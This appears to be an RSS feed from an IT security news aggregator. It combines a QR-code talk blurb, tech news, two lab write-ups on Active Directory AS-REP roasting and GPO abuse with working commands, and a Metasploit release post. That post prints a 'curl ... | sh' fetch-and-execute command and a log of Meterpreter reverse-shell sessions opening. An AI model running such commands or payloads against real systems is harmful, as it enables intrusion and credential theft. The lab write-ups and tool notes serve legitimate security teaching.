<pubDate>Sun, 19 Jul 2026 01:03:15 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[QR Codes! They're everywhere, and after this talk you'll see them everywhere. They've invaded every part of modern life - but how did they get there? (Have they always been here, in secret?)

This talk will cover the history of scanning things that contain information such as the barcode, covering not just one but TWO whole dimensions of scanning. Where was the first barcode (spoilers, it involves trains)? Is it true that barcodes caused a conspiracy in the 1980s?

We'll learn what competitors are there for the QR code and why they failed under the might of the QR. We'll explore why the QR code so pervasive in modern society and what makes them so good.

This presentation will generally be light hearted and whimsical, and will contain several jokes, some serious security advice, but generally be light entertainment. There will be no AI imagery or text.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/234-a-brief-history-of-the-qr-code-and-other-scannable-things]]></content:encoded>
</item>
<item>
<title><![CDATA[A Brief History of the QR Code, and other scannable things (emf2026)]]></title>
<description><![CDATA[QR Codes! They're everywhere, and after this talk you'll see them everywhere. They've invaded every part of modern life - but how did they get there? (Have they always been here, in secret?)

This talk will cover the history of scanning things that contain information such as the barcode, coverin...]]></description>
<link>https://tsecurity.de/de/3678572/it-security-video/a-brief-history-of-the-qr-code-and-other-scannable-things-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678572/it-security-video/a-brief-history-of-the-qr-code-and-other-scannable-things-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 00:32:40 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[QR Codes! They're everywhere, and after this talk you'll see them everywhere. They've invaded every part of modern life - but how did they get there? (Have they always been here, in secret?)

This talk will cover the history of scanning things that contain information such as the barcode, covering not just one but TWO whole dimensions of scanning. Where was the first barcode (spoilers, it involves trains)? Is it true that barcodes caused a conspiracy in the 1980s?

We'll learn what competitors are there for the QR code and why they failed under the might of the QR. We'll explore why the QR code so pervasive in modern society and what makes them so good.

This presentation will generally be light hearted and whimsical, and will contain several jokes, some serious security advice, but generally be light entertainment. There will be no AI imagery or text.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/234-a-brief-history-of-the-qr-code-and-other-scannable-things]]></content:encoded>
</item>
<item>
<title><![CDATA[The Google Pixel Watch 5 leaks just keep coming, with details and renders everywhere — here's what's likely in store for the Android smartwatch]]></title>
<description><![CDATA[Google Pixel Watch 5: purported leaks of prices, renders, colors and more have hit the internet.]]></description>
<link>https://tsecurity.de/de/3677803/it-nachrichten/the-google-pixel-watch-5-leaks-just-keep-coming-with-details-and-renders-everywhere-heres-whats-likely-in-store-for-the-android-smartwatch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677803/it-nachrichten/the-google-pixel-watch-5-leaks-just-keep-coming-with-details-and-renders-everywhere-heres-whats-likely-in-store-for-the-android-smartwatch/</guid>
<pubDate>Sat, 18 Jul 2026 12:01:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google Pixel Watch 5: purported leaks of prices, renders, colors and more have hit the internet.]]></content:encoded>
</item>
<item>
<title><![CDATA[How I AES-Roasted My Active Directory Lab (And How to Fix It)]]></title>
<description><![CDATA[AS-REP Roasting is one of the easiest ways to obtain Active Directory credentials without knowing a password. If a user has Kerberos Preauthentication disabled, the Domain Controller returns an AS-REP response that can be cracked offline.In this lab, I’ll show how I found a vulnerable account, cr...]]></description>
<link>https://tsecurity.de/de/3677785/hacking/how-i-aes-roasted-my-active-directory-lab-and-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677785/hacking/how-i-aes-roasted-my-active-directory-lab-and-how-to-fix-it/</guid>
<pubDate>Sat, 18 Jul 2026 11:39:18 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3Qej6ZBLHabmXE6oZO8CZw.png"></figure><p>AS-REP Roasting is one of the easiest ways to obtain Active Directory credentials <strong>without knowing a password</strong>. If a user has <strong>Kerberos Preauthentication disabled</strong>, the Domain Controller returns an AS-REP response that can be cracked offline.</p><p>In this lab, I’ll show how I found a vulnerable account, cracked its password, and authenticated to the domain.</p><h3>Lab</h3><ul><li>Domain: lab.local</li><li>DC: 192.168.56.104</li><li>Attacker: Kali Linux</li></ul><h3>Step 1 — Guess Usernames</h3><p>The first step is getting valid usernames.</p><p>In a real environment, these could come from LinkedIn, company emails, or OSINT. For this lab, I created a simple users.txt file.</p><h3>Step 2 — Find Vulnerable Accounts</h3><p>I used <strong>GetNPUsers.py</strong> to check whether any user has Kerberos preauthentication disabled.</p><pre>GetNPUsers.py lab.local/ -usersfile users.txt -dc-ip 192.168.56.104 -no-pass</pre><p>If an account is vulnerable, Impacket returns an AS-REP hash.</p><p>In my lab, the account <strong>svc_sql</strong> was vulnerable.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*opmClNnubizWsJ_lb710DQ.png"></figure><h3>Step 3 — Crack the Hash</h3><p>Next, I saved the hash into hash.txt and cracked it with Hashcat.</p><pre>hashcat -m 18200 hash.txt /home/&lt;user&gt;/Desktop/GOAD-LAB/GOAD/common-password-list/rockyou.txt</pre><p>Hashcat recovered the password:</p><pre>svc_sql : password@123</pre><p>Since this is an <strong>offline attack</strong>, the Domain Controller never sees the password guesses.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CUHP4nPsKVTRRhpEv2IlpA.png"></figure><h3>Step 4 — Verify the Credentials</h3><p>Finally, I verified the recovered password using NetExec.</p><pre>netexec smb 192.168.56.104 -u svc_sql -p 'password@123'</pre><p>Authentication was successful, confirming the credentials were valid.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mb2bcS4OR-v-hGZpme49WQ.png"></figure><h3>Why Does This Work?</h3><p>The account had <strong>“Do not require Kerberos Preauthentication”</strong> enabled.</p><p>Because of this, the Domain Controller returned an encrypted AS-REP response <strong>without asking for a password</strong>, allowing it to be cracked offline.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1018/1*fC4iUheghHwM2dXIo0L0-A.png"></figure><p>If we disable <strong>“Do not require Kerberos Preauthentication” </strong>will get output like this:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OMfML99LRPMkMTCliD1wzA.png"></figure><h3>How to Prevent AS-REP Roasting</h3><p>1. Enable Kerberos Preauthentication</p><p>2.Use strong passwords for service accounts</p><p>3. Use Group Managed Service Accounts (gMSA)</p><p>4. Regularly audit accounts with preauthentication disabled</p><p>5. Monitor Kerberos authentication events</p><p><strong>Disclaimer:</strong> <em>This article is written entirely for educational purposes and to help Active Directory administrators better defend their environments against advanced Kerberos attacks. The AES-Roasting attack showcased here was conducted in a controlled, self-hosted lab environment. Unsanctioned exploitation of these techniques on live, production systems without explicit authorization is strictly against the law. The author is not responsible for any malicious use of this material.</em></p><p><em>— Written by</em></p><p><strong>Aruvasaga Chithan A</strong></p><p><strong>Ethical Hacker &amp; Cyber Security Researcher.</strong></p><p><strong>Thanks for reading — your support keeps me writing.</strong><br><strong>See you in the next article…</strong></p><p><a href="http://www.linkedin.com/in/aruvasaga-chithan"><em>Linkedin</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=2bc057a8a20e" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-aes-roasted-my-active-directory-lab-and-how-to-fix-it-2bc057a8a20e">How I AES-Roasted My Active Directory Lab (And How to Fix It)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Abused a Group Policy Object (GPO) in Active Directory (And How to Fix It)]]></title>
<description><![CDATA[Group Policy Objects (GPOs) are one of the most powerful features in Active Directory. They allow administrators to manage settings across computers and users.But if the wrong user has control over a GPO, it can become an easy privilege escalation path.In this lab, I’ll use BloodHound to identify...]]></description>
<link>https://tsecurity.de/de/3677783/hacking/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677783/hacking/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it/</guid>
<pubDate>Sat, 18 Jul 2026 11:39:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IYSV94Q4TKE53NHop9sBDw.png"></figure><p>Group Policy Objects (GPOs) are one of the most powerful features in Active Directory. They allow administrators to manage settings across computers and users.</p><p>But if the wrong user has control over a GPO, it can become an easy privilege escalation path.</p><p>In this lab, I’ll use <strong>BloodHound</strong> to identify a dangerous GPO permission and then show how to fix it.</p><h3>Lab Setup</h3><ul><li><strong>Domain:</strong> LAB.LOCAL</li><li><strong>Domain Controller:</strong> 192.168.56.104</li><li><strong>Attacker:</strong> Kali Linux</li><li><strong>User:</strong> bob</li></ul><h3>Step 1 — Collect Active Directory Data</h3><p>First, I collected information from Active Directory using <strong>BloodHound.py</strong>.</p><pre>bloodhound-python -u bob -p 'password@123' -d lab.local -ns 192.168.56.104 -c All --zip</pre><p>BloodHound successfully collected:</p><ul><li>8 Users</li><li>55 Groups</li><li>3 GPOs</li><li>2 OUs</li><li>1 Computer</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jA0bN8_u-FCRSuDjOdIbFg.png"></figure><h3>Step 2 — Import into BloodHound</h3><p>Next, I uploaded the generated ZIP file into BloodHound Community Edition.</p><p>BloodHound maps relationships between users, groups, computers, OUs, and GPOs, making it much easier to spot privilege escalation paths.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*T0gcQnP34CNfRQp0qFv4hw.png"></figure><h3>Step 3 — Finding the Misconfiguration</h3><p>BloodHound showed that <strong>Bob</strong> had <strong>WriteDacl</strong>, <strong>WriteOwner</strong>, and <strong>GenericWrite</strong> permissions over the <strong>Employees Policy</strong> GPO.</p><p>These permissions are dangerous because they allow a user to modify who controls the GPO or change its configuration.</p><h3>Why Is This Dangerous?</h3><p>If an attacker can edit a GPO linked to an Organizational Unit (OU), they may be able to:</p><ul><li>Execute scripts on domain computers</li><li>Deploy scheduled tasks</li><li>Add users to local Administrators</li><li>Push malicious registry changes</li><li>Gain higher privileges across the domain</li></ul><p>A single misconfigured GPO can impact many systems at once.</p><h3>Step 4 — Fixing the Issue</h3><p>On the Domain Controller:</p><pre>Group Policy Management<br>        ↓<br>Employees Policy<br>        ↓<br>Delegation</pre><p>Review who has permissions on the GPO.</p><p>Remove unnecessary permissions such as:</p><ul><li>GenericWrite</li><li>misconfiguredWriteDacl</li><li>WriteOwner</li></ul><p>Only trusted administrators should have these rights.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1021/1*FC8s8UA4FIWW0lay8j9Ikw.png"></figure><h3>Verify the Fix</h3><p>Run BloodHound again after updating the permissions.</p><pre>bloodhound-python -u bob -p 'password@123' -d lab.local -ns 192.168.56.104 -c All --zip</pre><p>Re-import the ZIP into BloodHound.</p><p>The dangerous permission edges should no longer appear for <strong>Bob</strong>.</p><h3>Key Takeaways</h3><p>1.Regularly audit GPO permissions.</p><p>2. Use the principle of least privilege.</p><p>3. Review BloodHound findings periodically.</p><p>4. Remove unnecessary <strong>GenericWrite</strong>, <strong>WriteDacl</strong>, and <strong>WriteOwner</strong> permissions.</p><blockquote><strong><em>Disclaimer:</em></strong><em> </em>The techniques demonstrated in this article were performed in a private Active Directory lab for learning purposes. Always obtain proper authorization before testing any production environment.</blockquote><p><em>— Written by</em></p><p><strong>Aruvasaga Chithan A</strong></p><p><strong>Ethical Hacker &amp; Cyber Security Researcher.</strong></p><p><strong>Thanks for reading — your support keeps me writing.</strong><br><strong>See you in the next article…</strong></p><p><a href="http://www.linkedin.com/in/aruvasaga-chithan"><em>Linkedin</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5d59c031e602" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it-5d59c031e602">How I Abused a Group Policy Object (GPO) in Active Directory (And How to Fix It)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[“Not employee surveillance,” Microsoft defends Teams’ new location tracking feature, now rolling out]]></title>
<description><![CDATA[Until now, Microsoft Teams could answer a question like, “Is Jack available to talk right now?” as part of its built-in “online presence” feature. You have this feature almost everywhere, including Google Meet, and if you dislike it, you’re going to hate the new workplace check-in feature, which ...]]></description>
<link>https://tsecurity.de/de/3676928/windows-tipps/not-employee-surveillance-microsoft-defends-teams-new-location-tracking-feature-now-rolling-out/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676928/windows-tipps/not-employee-surveillance-microsoft-defends-teams-new-location-tracking-feature-now-rolling-out/</guid>
<pubDate>Fri, 17 Jul 2026 21:56:36 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Until now, Microsoft Teams could answer a question like, “Is Jack available to talk right now?” as part of its built-in “online presence” feature. You have this feature almost everywhere, including Google Meet, and if you dislike it, you’re going to hate the new workplace check-in feature, which can answer a question like, “Where is […]</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/07/18/not-employee-surveillance-microsoft-defends-teams-new-location-tracking-feature-now-rolling-out/">“Not employee surveillance,” Microsoft defends Teams’ new location tracking feature, now rolling out</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap Up: An HTTP to SMB relay plus Payload Improvements]]></title>
<description><![CDATA[Metasploit Wrap Up HousekeepingWhile the Metasploit Framework will be continuing its weekly release cadence, bringing you dear reader our latest content, the Weekly Wrap Up is being shifted to a bi-weekly cadence. The team is planning to use the additional time between posts to record demos of so...]]></description>
<link>https://tsecurity.de/de/3676924/it-security-nachrichten/metasploit-wrap-up-an-http-to-smb-relay-plus-payload-improvements/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676924/it-security-nachrichten/metasploit-wrap-up-an-http-to-smb-relay-plus-payload-improvements/</guid>
<pubDate>Fri, 17 Jul 2026 21:52:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Metasploit Wrap Up Housekeeping</h2><p>While the Metasploit Framework will be continuing its weekly release cadence, bringing you dear reader our latest content, the Weekly Wrap Up is being shifted to a bi-weekly cadence. The team is planning to use the additional time between posts to record demos of some of the more exciting content. Stay tuned for the next generation of Metasploit Wrap Ups and be sure to subscribe to the <a href="https://www.rapid7.com/blog/tag/metasploit/rss/">RSS Feed</a> to be alerted when new blogs are released.</p><h2>Fetch Multi: Just Fetch and Forget?</h2><p>Our very own <a href="https://github.com/bwatters-r7">bwatters-r7</a> continued to enhance our Fetch Payloads implementation. This time adding a new Linux Fetch Multi payload family that supports on-the-fly Linux architecture identification. Standard Fetch payloads produce a command that will download and execute a specific binary payload on a target, but the new Linux Fetch Multi family will report the architecture of the target host when it requests the payload, and the handler will automatically serve the correct elf architecture payload for the given target. It means that if a user is exploiting a Linux host, they do not need to guess the target’s architecture when selecting a payload. It also means that one payload and one handler can serve across multiple targets of differing architectures. Since these payloads work by adding a query string, only HTTP and HTTPS-based fetch payloads support Fetch Multi payloads.</p><p>Here is an example of the same payload and handler identifying and delivering the proper elf architecture payloads to a mipsel host, a mips64 host, and an aarch64 host by just executing the command <span data-type="inlineCode">curl -s http://10.5.135.210:8080/x|sh</span> on each target.</p><p></p><pre>msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; show options
Module options (payload/cmd/linux/http/multi/meterpreter_reverse_tcp):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, GET, TFTP, TNFTP,
                                               WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous
                                              handles, requires Linux ≥3.17 (for Python variant also Python ≥3
                                              .8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+
                                              , shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH   x                no        Local URI to use for serving payload
   LHOST           10.5.135.210     yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port
   When FETCH_COMMAND is one of CURL,GET,WGET:
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  true             yes       Host both the binary payload and the command so it can be piped dire
                                          ctly to the shell.
   When FETCH_FILELESS is none:
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      cldOGvRDplZ      no        Name to use on remote system when storing payload; cannot co
                                                  ntain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
View the full module info with the info, or info -d command.
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; to_handler
[*] Command to execute on target: curl -s http://10.5.135.210:8080/x|sh
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 10.5.135.210:8080
[*] HTTP server started
[*] Adding resource /csmCra8lnQTHxFXkipQC0w
[*] Adding resource /x
[*] Started reverse TCP handler on 10.5.135.210:4444 
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; [*] Client 10.5.132.212 requested /x
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Client 10.5.132.212 requested /csmCra8lnQTHxFXkipQC0w?arch=armv7l
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for armle arch
[*] Meterpreter session 1 opened (10.5.135.210:4444 -&gt; 10.5.132.212:45068) at 2026-07-14 11:33:18 -0500
[*] Client 10.5.132.214 requested /x
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Client 10.5.132.214 requested /csmCra8lnQTHxFXkipQC0w?arch=aarch64
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for aarch64 arch
[*] Meterpreter session 2 opened (10.5.135.210:4444 -&gt; 10.5.132.214:39894) at 2026-07-14 11:33:26 -0500
[*] Client 10.5.132.224 requested /x
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Client 10.5.132.224 requested /csmCra8lnQTHxFXkipQC0w?arch=mips64
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for mips64 arch
[*] Meterpreter session 3 opened (10.5.135.210:4444 -&gt; 10.5.132.224:53506) at 2026-07-14 11:33:41 -0500
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (10.5.132.212)
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : cmd/linux
[*] Running 'sysinfo' on meterpreter session 2 (10.5.132.214)
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : cmd/linux
[*] Running 'sysinfo' on meterpreter session 3 (10.5.132.224)
Computer     : ubnt
OS           : Debian 9.13 (Linux 4.9.79-UBNT)
Architecture : mips64
BuildTuple   : mips64-linux-muslsf
Meterpreter  : cmd/linux
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt;</pre><h2>RISC architecture is going to change everything!</h2><p>Speaking of juggling multiple architectures, <a href="https://github.com/bcoles">bcoles</a> added support for yet another IoT arch: RiscV. The change adds staged and stageless shell payloads for both 32- and 64-bit RiscV systems, and dovetails well with his other PR adding XOR encoders for RiscV payloads.</p><h2>New module content (4)</h2><h3>Microsoft Windows HTTP to SMB Relay</h3><p>Author: jheysel-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21620">#21620</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: server/relay/http_to_smb</p><p>Description: Adds an HTTP to SMB Relay server module allowing users to relay an incoming NTLM HTTP authentication request to multiple SMB servers in order to establish SMB session on the target hosts to be used by the framework.</p><h3>Byte XORi Encoder</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Encoder</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21235">#21235</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Path: riscv32le/byte_xori</p><p>Description: Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.</p><h3>FTP, HTTP, HTTPS and METERPRETER_REVERSE_TCP Fetch, Linux Chmod</h3><p>Authors: Brendan Watters, Spencer McIntyre, and bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Payload (Adapter)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21384">#21384</a> contributed by <a href="https://github.com/bwatters-r7">bwatters-r7</a></p><p>Description: Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.</p><p>This adapter adds 421 new payloads for all Linux and Windows architectures including:</p><ul><li>cmd/linux/ftp/aarch64/chmod</li><li>cmd/linux/ftp/x86/meterpreter/reverse_tcp</li><li>cmd/windows/ftp/aarch64/meterpreter_reverse_http</li></ul><h3>FTP Fetch, Linux dup2 Command Shell, Bind TCP Stager</h3><p>Authors: Brendan Watters, Spencer McIntyre, and bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Payload (Stager)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21237">#21237</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Description: Adds reverse_tcp and bind_tcp stagers and a shell command stage for both RISC-V 64-bit and 32-bit little-endian Linux targets.</p><ul><li>cmd/linux/ftp/riscv32le/shell/bind_tcp</li><li>cmd/linux/http/riscv32le/shell/bind_tcp</li><li>cmd/linux/https/riscv32le/shell/bind_tcp</li><li>cmd/linux/tftp/riscv32le/shell/bind_tcp</li><li>linux/riscv32le/shell/bind_tcp</li><li>cmd/linux/ftp/riscv32le/shell/reverse_tcp</li><li>cmd/linux/http/riscv32le/shell/reverse_tcp</li><li>cmd/linux/https/riscv32le/shell/reverse_tcp</li><li>cmd/linux/tftp/riscv32le/shell/reverse_tcp</li><li>linux/riscv32le/shell/reverse_tcp</li><li>cmd/linux/ftp/riscv64le/shell/bind_tcp</li><li>cmd/linux/http/riscv64le/shell/bind_tcp</li><li>cmd/linux/https/riscv64le/shell/bind_tcp</li><li>cmd/linux/tftp/riscv64le/shell/bind_tcp</li><li>linux/riscv64le/shell/bind_tcp</li><li>cmd/linux/ftp/riscv64le/shell/reverse_tcp</li><li>cmd/linux/http/riscv64le/shell/reverse_tcp</li><li>cmd/linux/https/riscv64le/shell/reverse_tcp</li><li>cmd/linux/tftp/riscv64le/shell/reverse_tcp</li><li>linux/riscv64le/shell/reverse_tcp</li></ul><h2>Enhancements and features (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21235">#21235</a> from <a href="https://github.com/bcoles">bcoles</a> - Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21384">#21384</a> from <a href="https://github.com/bwatters-r7">bwatters-r7</a> - Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21599">#21599</a> from <a href="https://github.com/Pushpenderrathore">Pushpenderrathore</a> - This extends CertificateTrace functionality to also surface the server's TLS peer certificate when an HTTP module connects over HTTPS. This makes use of the same CertificateTrace enum (off/metadata/full) operators are already familiar with.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21602">#21602</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updates the Windows service PE template to use an injected segment instead of the old substitution method.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21621">#21621</a> from <a href="https://github.com/eipoverflow">eipoverflow</a> - This fix a limitation on running fileless staged Meterpreter in recent OSX versions.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21670">#21670</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Marks the dynamic XOR encoders as unable to preserve registers and adds regression coverage for stage encoding when a preserved register is required.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21675">#21675</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Fix search_cache job cache generation by skipping multi arch payloads.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21677">#21677</a> from <a href="https://github.com/bwatters-r7">bwatters-r7</a> - Fixes a bug in the HTTP relay server mixin where requests matching the module's URIPATH were silently dropped instead of being relayed The fix removes the now-unnecessary URIPATH option, ensures all requests are properly relayed, and adds spec tests to cover the fix.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-07-08T13%3A32%3A18-07%3A00..2026-07-15T15%3A48%3A48-07%3A00%22">Pull Requests 6.4.143...6.4.144</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.143...6.4.144">Full diff 6.4.143...6.4.144</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple widens OpenAI trade secrets fight with preservation orders]]></title>
<description><![CDATA[Dozens of former Apple employees now working at OpenAI have been put on notice after Apple reportedly sent legal letters ordering them to preserve documents and communications relevant to its trade secrets lawsuit against OpenAI. 



The Financial Times reports that “around 40” employees have bee...]]></description>
<link>https://tsecurity.de/de/3676186/it-nachrichten/apple-widens-openai-trade-secrets-fight-with-preservation-orders/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676186/it-nachrichten/apple-widens-openai-trade-secrets-fight-with-preservation-orders/</guid>
<pubDate>Fri, 17 Jul 2026 15:32:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Dozens of former Apple employees now working at OpenAI have been put on notice after Apple reportedly sent legal letters ordering them to preserve documents and communications relevant to its trade secrets lawsuit against OpenAI. </p>



<p class="wp-block-paragraph"><a href="https://www.ft.com/content/1b8c9d52-88a9-426b-ba47-f1811f859166" target="_blank" rel="noreferrer noopener">The Financial Times reports</a> that “around 40” employees have been targeted with these letters, which repeat Apple’s claim that its confidential information might have been exfiltrated, alleging “trade secret misappropriation and breach of contract.”  The letters also require them to arrange to meet with Apple’s lawyers.</p>



<h2 class="wp-block-heading"><strong>The underlying lawsuit</strong></h2>



<p class="wp-block-paragraph">This comes on the heels of <a href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html">Apple’s explosive lawsuit against OpenAI</a> in which Apple accused the AI company (and former Apple Vice President Tang Tan) of extensive coordinated data theft. Tan was at Apple for 24 years and is now Chief Hardware Officer at OpenAI. </p>



<p class="wp-block-paragraph">Apple’s lawsuit is defined by claims OpenAI took a range of steps to pry confidential Apple data from existing Apple employees, including using information such as internal project code names, to gain even more knowledge during interviews. The company says the evidence it has presented so far is only the “tip of the iceberg” concerning OpenAI’s approach.</p>



<p class="wp-block-paragraph">The lawsuit requests that OpenAI be prevented from using any Apple information during the development of its hardware. Apple is also seeking damages and suing two former employees for breach of contract for violating their employment agreements.</p>



<p class="wp-block-paragraph">The letters are significant. They represent formal directives that require former Apple staff to preserve documents, messages, emails, and other communications that could be relevant to the case. The demand reflects Apple’s belief that the alleged misuse of confidential information could be more widespread across the competing company. What’s critical is that orders of this kind override any standard data destruction policy and deletion of the requested information becomes a legal offense. </p>



<h2 class="wp-block-heading"><strong>Why this matters beyond the protagonists</strong></h2>



